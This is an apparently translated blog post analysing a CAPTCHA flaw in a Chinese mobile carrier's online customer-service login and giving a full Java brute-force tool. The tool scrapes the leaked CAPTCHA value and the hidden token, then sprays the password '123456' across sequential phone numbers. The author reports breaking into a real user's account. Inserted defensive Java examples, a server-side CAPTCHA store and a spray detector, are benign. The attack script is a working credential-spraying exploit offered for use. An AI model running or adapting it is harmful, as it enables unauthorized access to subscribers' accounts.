SoFunction
Updated on 2025-04-10

Analysis and exploitation of flaws in the verification code of the Henan Mobile online customer service system

A disclaimer first: this article has no real technical depth. It only shows that Java can also be used to write a cracking tool.

Everyone should be familiar with China Mobile's online customer service system. I am a loyal Henan Mobile user, so naturally I start with Henan Mobile. Anyone who has handled services in a Mobile business hall knows that the user password can only be 6 digits, each 0~9. The online service system is synchronized with the mobile core database, so its password is limited to the same 6 digits. Such a small password space is well suited to brute-force cracking.
Let's analyze the feasibility of brute-force cracking. First, it only works if the system does not limit the number of login attempts per day. I entered a mobile phone number to test how many failures the system tolerates. I tried ten times and could still reach the login interface (so there is a chance). Next, analyze the key fields that are submitted at login. Take a look at the login page /new_wskf/login/login_portal.jsp
__________________________________________
.....................
<form method="post" name="thisform" 
//Post
...........
action="/servlet/."> -->
// The servlet that handles the login event; the fields below appear to be the parameters it receives.
    <input type="hidden" name="forwardFlag" value="0">
// Key field forwardFlag: I don't know what it is for, but it does not change across page refreshes.
<input type="hidden" name="transaction" value="3">
// Key field transaction: same as above.
<input type="hidden" name="ssRandomPass" value="dNZjN/vfR4HwMACDVqhncQ==" >
// Key field ssRandomPass: gets a new random value on every refresh and is not displayed on the page.
// It may be hidden identity information.
......................
// The following are the form fields filled in by the user
<td><input type="text" name="userName" size="14"
// Mobile phone number
<td><input type="password" name="passWord" 
// Mobile password
<td><input name="randomPassword" type="text"
// Image verification code
.......................................
___________________________________


To sum up, the POST body is: forwardFlag=0&transaction=3&ssRandomPass=dNZjN/vfR4HwMACDVqhncQ==&userName=135********&passWord=******&randomPassword=****

passWord is the value we want to guess, and the key problem is how to pin down randomPassword (the verification code), that is, how to deal with the image verification code. On that subject, it is worth mentioning that in the era before verification codes, brute-force cracking software was very popular and very effective against most mail servers and forums. It also made a number of classic cracking tools famous, such as flowing light and snow tracing. (Haha, they are all cultural relics worth collecting.)
Let's see how the verification code is generated here: right-click the verification code picture. Haha, what do we see? /s ... let?randomPass=9814 <- Isn't this exactly the value of our verification code?
We request that application with the value of randomPass changed to 1111. Haha, as expected, a picture showing 1111 is generated. This shows that the login check and the verification code generation are two separate applications: the returned login page passes the code as a request parameter, and the image generator simply renders it.
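The flaw above is that the image endpoint renders whatever the client sends in randomPass, so the answer passes through the browser. As an added example (not from the original article or from the Henan Mobile system), this Java class keeps the answer on the server and puts only an opaque id in the page; the name CaptchaStore, its methods and the 120-second lifetime are assumptions.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

/** Added example: CAPTCHA answers live only on the server, keyed by an opaque id. */
public class CaptchaStore {
    private record Challenge(String answer, long expiresAtMs) {}

    private static final long TTL_MS = 120_000;   // assumed challenge lifetime
    private final SecureRandom rng = new SecureRandom();
    private final Map<String, Challenge> pending = new ConcurrentHashMap<>();

    /** Called when the login page is rendered; only the returned id goes into the HTML. */
    public String issue(long nowMs) {
        byte[] raw = new byte[16];
        rng.nextBytes(raw);
        String id = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        pending.put(id, new Challenge(String.format("%04d", rng.nextInt(10_000)), nowMs + TTL_MS));
        return id;
    }

    /** Image servlet: looks the answer up by id, never reads it from the request. */
    public String answerForRendering(String id, long nowMs) {
        Challenge c = (id == null) ? null : pending.get(id);
        return (c == null || nowMs > c.expiresAtMs()) ? null : c.answer();
    }

    /** Login servlet: single use, so a wrong guess also burns the challenge. */
    public boolean verify(String id, String submitted, long nowMs) {
        Challenge c = (id == null) ? null : pending.remove(id);
        if (c == null || submitted == null || nowMs > c.expiresAtMs()) return false;
        return MessageDigest.isEqual(c.answer().getBytes(StandardCharsets.UTF_8),
                                     submitted.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        CaptchaStore store = new CaptchaStore();
        long now = System.currentTimeMillis();
        String id = store.issue(now);
        String shown = store.answerForRendering(id, now);      // what a human reads off the image
        String wrong = "0000".equals(shown) ? "1111" : "0000";
        System.out.println("wrong guess:  " + store.verify(id, wrong, now));   // false
        System.out.println("after burn:   " + store.verify(id, shown, now));   // false
        String id2 = store.issue(now);
        System.out.println("correct once: " + store.verify(id2, store.answerForRendering(id2, now), now)); // true
        System.out.println("replayed:     " + store.verify(id2, store.answerForRendering(id2, now), now)); // false
    }
}
```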

At this point, our analysis work is complete. There is no technical difficulty in writing a program to carry out the brute-force cracking. I wrote a Java application, and it compiled and tested successfully under win2000. I followed the pattern some QQ crackers use: the password was fixed at 123456 and I kept changing the phone number. In less than 10 minutes, I found a user with a password of 123456.
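The pattern described above, one fixed password tried against many phone numbers, never trips a per-account failure counter, because each account sees only a single attempt. As an added example (not the author's code), this Java class counts distinct failed accounts per source over constructed login events; SprayDetector, the Attempt fields, the 10-minute window and the threshold of 5 are assumptions.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/** Added example: flag a source whose failed logins span many distinct accounts. */
public class SprayDetector {
    record Attempt(long tsMs, String sourceIp, String userName, boolean success) {}

    private final long windowMs;
    private final int maxDistinctFailedUsers;
    // per source: user name -> time of its most recent failed attempt
    private final Map<String, Map<String, Long>> failedBySource = new HashMap<>();

    SprayDetector(long windowMs, int maxDistinctFailedUsers) {
        this.windowMs = windowMs;
        this.maxDistinctFailedUsers = maxDistinctFailedUsers;
    }

    /** Returns true when this failed attempt puts its source over the threshold. */
    boolean observe(Attempt a) {
        if (a.success()) return false;
        Map<String, Long> users =
                failedBySource.computeIfAbsent(a.sourceIp(), k -> new HashMap<>());
        users.put(a.userName(), a.tsMs());
        users.values().removeIf(ts -> a.tsMs() - ts > windowMs);   // slide the window
        return users.size() > maxDistinctFailedUsers;
    }

    public static void main(String[] args) {
        SprayDetector d = new SprayDetector(600_000, 5);   // assumed: 10 minutes, 5 accounts
        List<Attempt> log = new ArrayList<>();
        // Constructed sample: one source walks through numbers, one attempt each.
        for (int i = 0; i < 8; i++)
            log.add(new Attempt(1_000L * i, "198.51.100.7",
                    String.format("1350000%04d", i), false));
        // Constructed sample: a real user mistypes their own password three times.
        for (int i = 0; i < 3; i++)
            log.add(new Attempt(2_000L * i, "203.0.113.9", "13500009999", false));
        for (Attempt a : log)
            if (d.observe(a))   // fires on the 6th, 7th and 8th number from 198.51.100.7 only
                System.out.println("ALERT: spray from " + a.sourceIp()
                        + ", latest account " + a.userName());
    }
}
```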


*******This code is only for research and I am not responsible for the possible consequences of this program*******


The source code is as follows:
--------------



import java.io.*;
import java.net.*;

public class Result
{
    public static String ssRandomPass, randomPassword;
    // Set the six-digit mobile phone password and the last five digits of the mobile phone number
    public static int passWord = 123456, num = 00000;

    public static void main(String args[]) {
        while (true)
        {
            // This function captures the key fields from the login page
            check();

            try {
                URL url = new URL("/servlet/.");
                URLConnection connection = url.openConnection();
                connection.setDoOutput(true);

                OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "8859_1");

                // The information is submitted here
                out.write("forwardFlag=0&transaction=3&ssRandomPass=" + ssRandomPass + "&userName=135286" + num
                        + "&" + "passWord=" + passWord + "&randomPassword=" + randomPassword);
                out.flush();
                out.close();

                // Get back data
                BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
                String line = null;
                StringBuffer content = new StringBuffer();
                while ((line = in.readLine()) != null)
                {
                    // line is the returned data, which can determine whether the login succeeded
                    content.append(line);
                }

                in.close();
                in = null;
                url = null;
                String msg = content.toString();

                System.out.println("Back code:" + msg.length() + " check passwd:" + passWord);
                System.out.println("check num:135256" + num);
                // Stop on a response of length 412 or when the number range is exhausted
                if (msg.length() == 412 | num == 99999)
                {
                    System.out.println("Get one phonenumber");
                    System.out.println(msg);
                    break;
                }
                // passWord++;
                num++;

            } catch (MalformedURLException e) {
                e.printStackTrace();
            } catch (UnsupportedEncodingException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

    public static void check()
    {
        StringBuffer ssR = new StringBuffer();
        StringBuffer rand = new StringBuffer();
        try {
            URL url = new URL("/new_wskf/login/login_portal.jsp");
            URLConnection connection = url.openConnection();
            connection.setDoOutput(true);

            OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "8859_1");
            out.write("?");
            out.flush();
            out.close();

            // Get back data
            BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            String line = null;
            StringBuffer content = new StringBuffer();
            while ((line = in.readLine()) != null)
            {
                // line is the returned login page, one line at a time
                content.append(line);
            }

            in.close();
            in = null;
            url = null;
            String msg = content.toString();

            // ssRandomPass: 24 characters at a fixed offset in the returned page
            for (int i = 0; i <= 23; i++)
                ssR.append(msg.charAt(1534 + i));
            ssRandomPass = ssR.toString();
            System.out.println(ssR.toString());

            // randomPassword: the 4-character verification code at a fixed offset in the returned page
            for (int i = 0; i <= 3; i++)
                rand.append(msg.charAt(2492 + i));
            randomPassword = rand.toString();
            System.out.println(rand.toString());

            // System.out.println(msg);
        } catch (MalformedURLException e) {
            e.printStackTrace();
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}